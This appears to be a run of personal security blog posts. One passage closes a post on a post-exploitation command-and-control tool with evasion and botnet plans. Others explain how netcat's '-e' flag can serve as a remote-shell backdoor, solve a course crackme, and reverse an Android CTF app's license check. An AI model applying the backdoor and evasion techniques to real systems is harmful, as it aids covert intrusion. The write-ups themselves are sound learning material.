that wouldn’t be as much work, but only slightly more secure than the current
cleartext communications would be to use a basic xor cipher which would be
pretty easy to write, and force an analyst to retrieve the key from memory,
or the initial exchange over the network, depending on how I chose to implement it.
protocol improvement: This shouldn’t actually be too hard to implement,
but the data section of a poet message is typically some type of keyword, a space,
then any relevant data. For example, to start a shell, the server sends
over “shell”, to get recon data, the server sends “recon”, for an exec
command, the server sends over “exec” followed by the commands to execute.
Instead of using these string keywords, it would be possible to move them into
the protocol as a single byte after the data size and have some sort
of lookup table for referencing the appropriate action to each key.
interval fuzzing: Instead of having a strict, predictable delay time
interval for client pings, I could implement some sort of fuzzing so that the delay
time is slightly variable for further obfuscation
purposes.
and last, but not least…
botnet(?!): Now that I more or less have the infrastructure down for
controlling a single client, it would be pretty cool to
fork the project and adapt it for a more distributed design with multiple
clients connecting to the server, all receiving commands to execute.
Again, all the code for this project is available on github.
Hopefully this was interesting/helpful for some people, and as always thanks for reading!
[1] Writing this post and thinking about this again actually helped me discover a bug in the server where the server would terminate if it happened to receive a non-client HTTP request while waiting for the client. This would enable a third party that wanted to mess with the Poet user to spam the Poet user's machine with HTTP requests (assuming they knew the proper port to send to) at any interval smaller than the Poet interval, and effectively DOS Poet.
As I mentioned in a previous post, netcat has this cool
-e parameter that lets you specify an executable to essentially turn into
a network service, that is, a process that can send and receive data over the
network. This option is particularly useful when called with a shell
(/bin/sh, /bin/bash, etc) as a parameter because this creates a poor man’s
remote shell connection, and can also be used as a backdoor into the system.
As part of the post-exploitation tool I’m
working on, I wanted to try to add this type of remote shell feature, but it
wasn’t immediately obvious to me
how something like this would be done, so I decided to dive into netcat’s
source and see if I could understand how it was implemented.
Not knowing where to start, I first tried searching the file for “-e” which
brought me to:
```c
case 'e':			/* prog to exec */
  if (opt_exec)
    ncprint(NCPRINT_ERROR | NCPRINT_EXIT,
	    _("Cannot specify `-e' option double"));
  opt_exec = strdup(optarg);
  break;
```
This snippet uses the GNU argument parsing library, getopt, to handle the "-e" flag: if opt_exec is already set (meaning "-e" was given more than once), it errors out; otherwise it sets the global char* variable opt_exec to the parameter. Then I tried searching for opt_exec, bringing me to:
```c
if (netcat_mode == NETCAT_LISTEN) {
  if (opt_exec) {
    ncprint(NCPRINT_VERB2, _("Passing control to the specified program"));
    ncexec(&listen_sock);		/* this won't return */
  }
  core_readwrite(&listen_sock, &stdio_sock);
  debug_dv(("Listen: EXIT"));
}
```
This code checks if opt_exec is set, and if so, calls ncexec().
```c
 1  /* Execute an external file making its stdin/stdout/stderr the actual socket */
 2
 3  static void ncexec(nc_sock_t *ncsock)
 4  {
 5    int saved_stderr;
 6    char *p;
 7    assert(ncsock && (ncsock->fd >= 0));
 8
 9    /* save the stderr fd because we may need it later */
10    saved_stderr = dup(STDERR_FILENO);
11
12    /* duplicate the socket for the child program */
13    dup2(ncsock->fd, STDIN_FILENO);	/* the precise order of fiddlage */
14    close(ncsock->fd);			/* is apparently crucial; this is */
15    dup2(STDIN_FILENO, STDOUT_FILENO);	/* swiped directly out of "inetd". */
16    dup2(STDIN_FILENO, STDERR_FILENO);	/* also duplicate the stderr channel */
17
18    /* change the label for the executed program */
19    if ((p = strrchr(opt_exec, '/')))
20      p++;				/* shorter argv[0] */
21    else
22      p = opt_exec;
23
24    /* replace this process with the new one */
25  #ifndef USE_OLD_COMPAT
26    execl("/bin/sh", p, "-c", opt_exec, NULL);
27  #else
28    execl(opt_exec, p, NULL);
29  #endif
30    dup2(saved_stderr, STDERR_FILENO);
31    ncprint(NCPRINT_ERROR | NCPRINT_EXIT, _("Couldn't execute %s: %s"),
32  	  opt_exec, strerror(errno));
33  }				/* end of ncexec() */
```
Here, on lines 13-16, is how the "-e" parameter really works. dup2() accepts two file descriptors; after deallocating the second one (as if close() was called on it), it makes the second descriptor a duplicate of the first. So in this case, on line 13, the child process's stdin is being set to the file descriptor for the network socket netcat opened. This means that the child process will treat any data received over the network as input data and will act accordingly.
Then on lines 15 and 16, the stdout and stderr descriptors are also set to the
socket, which will cause any output the program has to be directed over the
network. As far as line 14 goes, I’m not sure why the original socket file descriptor
has to be closed at that exact point (and based on the comments, it seems like
the netcat author wasn’t sure either).
The main point is this file descriptor swapping has essentially
converted our specified program into a network service; all the input and output
will be piped over the network, and at this point the child process can
be executed. The child will replace the netcat process and will also inherit
the newly set socket file descriptors. Note that on lines 30 and 31 there’s
some error handling code that resets the original stderr for the netcat process
and prints out an error message. This is because the code should actually
never get to this point in execution due to the execl() call and if it does,
there was an error executing the child.
I wrote this little python program to see if I understood
things correctly:
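(The script and terminal session aren't shown here, but it was along these lines: a script that reads from stdin and writes to stdout, which -e has wired to the socket, launched with something like nc -l -p 1234 -e ./echo.py & and poked at with echo hello | nc localhost 1234.)

```python
#!/usr/bin/env python
# echo.py (illustrative name): with netcat's -e, stdin and stdout *are* the
# socket, so plain stdin/stdout I/O talks over the network
import sys

data = sys.stdin.readline()              # arrives from the remote end
sys.stdout.write('you sent: ' + data)    # goes back out over the socket
sys.stdout.flush()
```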
We can see the “server” launched in the background. The echo command sends
data into netcat’s stdin, which is being sent over the network, handled by
the python script, which sends back its response, which gets printed. Then we
can see that the server exits since the netcat process has been replaced by
the script, and the script has exited.
As part of an Intro to Security course I’m taking, my professor gave us
a crackme style exercise to practice reading x86 assembly and basic
reverse engineering.
The program is pretty simple. It accepts a password as an argument and we’re
told that if the password is correct, “ok” is printed.
$ ./crackme
usage: ./crackme <secret>
$ ./crackme test
$
As usual, I start by running file on the binary, which shows that it’s a
standard x64 ELF binary. file also says that the binary is “not stripped”, which means
that it includes symbols. All I really know about symbols is that they can
include debugging information about a binary like function and variable names
and some symbols aren’t really necessary; they can be stripped out to reduce
the binary’s size and make reverse engineering more challenging. Maybe I’ll
do a more in depth post on this in the future.
$ file crackme
crackme: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.32, BuildID[sha1]=0x3fcf895b7865cb6be6b934640d1519a1e6bd6d39, not stripped
Next, I run strings, hoping to get lucky and find the password amongst the
strings in the binary. Strings looks for series of printable characters followed
by a NULL, but unfortunately nothing here works as the password.
Starting at the beginning, we see the stack pointer decremented as part of
the function prologue. The prologue is a set of setup steps involving
saving the old frame’s
base pointer on the stack, reassigning the base pointer to the current
stack pointer, then subtracting a certain amount from the stack pointer to make room
on the stack
for local variables, etc. We don’t see the former two steps because this is
the main function so it doesn’t really have a function calling it, so saving/setting
the base pointer isn’t necessary.
Then the edi register is
compared to 1 and if it is less than or equal, we jump to offset 39.
Here at offset 39, we print something then jump to offset 34 where we repair
the stack (undo the sub instruction from the prologue) and return (ending
execution).
This is likely how the program checks the arguments and prints the usage
message if no arguments are supplied (which would cause argc/edi to be 1).
However if we supply an argument, edi is 0x2 and we move past the jle
instruction.
Here we can see the verify_secret function being called with a parameter
in rdi. This is most likely the argument we passed into the program. We can
confirm this with gdb (I’m using it with peda here).
Indeed rsi points to the first element of argv, so incrementing that by 8 bytes
(because 64 bit) points to argv[1], which is our input.
If we look after the verify_secret call we can see the program checks
if eax is 0 and if it is, jumps to offset 34, ending the program. However, if
eax is not zero, we’ll hit a puts call before exiting, which will presumably
print out the “ok” message we want.
I won’t walk through this one in detail because understanding each line
isn’t necessary to crack this. Let’s skip to
the memcmp call. If memcmp returns 0, eax is set to 1 and the function
returns. This is exactly what we want. From the man page, memcmp takes three
parameters, two buffers to compare and their lengths, and returns 0 if the
buffers are identical.
Here’s the setup to the memcmp call. We can see the third parameter for length
is the immediate 0x18 meaning the buffers will be 24 bytes in length. If we
examine address 0x600a80, we find this 24 byte string:
Since this is a direct address to some memory, we can be fairly certain that
we’ve found some sort of secret value! Based on the movzx eax,BYTE PTR [rdi]
instruction (offset 7)
which moves a byte from the input string into eax, the xor eax, 0xfffffff7
instruction (offset 36), and
the add rdi, 0x1 instruction (offset 54) which increments the char*
pointer to our input string, we can reasonably guess
that this function is xor'ing each character of our input with 0xf7 and writing
the result into a buffer which begins at rsp (also pointed to by rcx). Since
we now know the secret (\x91\xbf\xa4\x85...) and the xor key (0xf7) it’s
pretty easy to extract the password we need by xor'ing each byte of the secret
with the xor key.
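Extracting it is only a few lines of Python (a sketch; the full 24-byte secret is elided here, only the first few bytes quoted above are filled in):

```python
secret = '\x91\xbf\xa4\x85'  # ...plus the remaining 20 bytes from 0x600a80
password = ''.join(chr(ord(c) ^ 0xf7) for c in secret)
print password
```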
This weekend I decided to try playing SU-CTF.
I’m pretty bad at CTF to be honest, so I was pretty thrilled to get
one of the 200 point challenges in the third (of five) difficulty tiers.
“Commerical Application!”
For this challenge, we’re given an Android application and the hint:
Flag is a serial number.
I installed it on my phone, here’s what it looks like:
I can tap on “Picture-01” and sliding to the right reveals this picture, but
if I try to tap on “Picture-02” or “Pictures-03” the app says I need to
enter a registration key. If I tap on the gear in the top right, I’m
prompted to enter my product key.
Running file reveals that .apk files are apparently just Zip archives,
so let’s try simply unzip‘ing it.
$ file suCTF.apk
suCTF.apk: Zip archive data, at least v2.0 to extract
$ unzip suCTF.apk
Archive: suCTF.apk
inflating: assets/db.db
inflating: res/color/abs__primary_text_disable_only_holo_dark.xml
inflating: res/color/abs__primary_text_disable_only_holo_light.xml
...
inflating: classes.dex
inflating: META-INF/MANIFEST.MF
inflating: META-INF/CERT.SF
inflating: META-INF/CERT.RSA
Cool! Now we have all the miscellaneous files that comprise the app. There’s
a database file, various .xml design files, and most interestingly, a
classes.dex file. .dex files contain bytecode run on the Android Dalvik VM, which
is currently the Java runtime for Android devices, so classes.dex likely
contains the code that runs the app, in compiled form. We can use the nifty
d2j-dex2jar utility for decompiling it into a classes-dex2jar.jar file. .jar
files are apparently also Zip archives, and we can again unzip it to extract
its contents.
This produces a TON of various .class files, but the most interesting lie
in the edu/sharif/ctf/ directory and are the compiled versions of the actual
code that makes up this app. We can use the jad tool to decompile these back
into Java source and start trying to reverse the product key.
There's a directory in the app source called security/ that contains a file
called KeyVerifier.class that seems pretty promising. After decompiling it,
we find a KeyVerifier class with some pretty cool functions.
It’s pretty clear that isValidLicenceKey() is what processes the product key
prompt in the app. The encrypt() function shows us that the first parameter
s is the cleartext to be encrypted, the second parameter s1 is the AES
encryption key, and the last parameter s2 is the AES
initialization vector.
After doing a bit of grepping, I confirmed this by decompiling
activities/MainActivity.class and finding this code snippet:
```java
public void onClick(DialogInterface dialoginterface, int i)
{
    if (KeyVerifier.isValidLicenceKey(userInput.getText().toString(),
            app.getDataHelper().getConfig().getSecurityKey(),
            app.getDataHelper().getConfig().getSecurityIv()))
    {
        app.getDataHelper().updateLicence(2014);
        MainActivity.isRegisterd = true;
        showAlertDialog(context, "Thank you, Your application has full licence. Enjoy it...!");
    } else
    {
        showAlertDialog(context, "Your licence key is incorrect...! Please try again with another.");
    }
}
```
With
this in mind, the code seems to AES encrypt the user input and check if it matches
a certain output. If we had the AES key and IV, we could decrypt the given
output and find the plaintext product key.
Tracing through the calls for the second and third parameters passed into
isValidLicenceKey(), I found that
the AES key and IV were stored in the assets/db.db SQLite database I noticed
earlier.
$ sqlite3 assets/db.db
...
sqlite> select * from config;
a b c d e f g h i
---------- ---------- ---------- ---------- ---------------- -------------------------------- ---------- -------------- ----------
1220140 a5efdbd57b84ca36 37eaae0141f1a3adf8a1dee655853714 1000 ctf.sharif.edu 9
There are no headers to the columns, but it is pretty obvious that the key
is the longer and the IV is the shorter of the “interesting strings” in the
database. For further confidence, I can verify this from the decompiled code
in db/DBHelper.class.
Using the key, IV and expected encrypted output, I wrote a simple decryption
program.
```java
import java.util.*;
import javax.crypto.Cipher;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;

public class blah
{
    // omitted for brevity
    public static String bytesToHexString(byte abyte0[]) { ... }
    public static byte[] hexStringToBytes(String s) { ... }

    public static String decrypt(String s, String s1, String s2)
    {
        SecretKeySpec secretkeyspec = new SecretKeySpec(hexStringToBytes(s1), "AES");
        Cipher cipher = null;
        byte[] key = null;
        try
        {
            cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
            cipher.init(Cipher.DECRYPT_MODE, secretkeyspec, new IvParameterSpec(s2.getBytes()));
            key = cipher.doFinal(hexStringToBytes(s));
        }
        catch (Exception e)
        {
            e.printStackTrace();
        }
        return new String(key);
    }

    public static void main(String args[])
    {
        String e = "29a002d9340fc4bd54492f327269f3e051619b889dc8da723e135ce486965d84";
        String iv = "a5efdbd57b84ca36";
        String key = "37eaae0141f1a3adf8a1dee655853714";
        System.out.println(decrypt(e, key, iv));
    }
}
```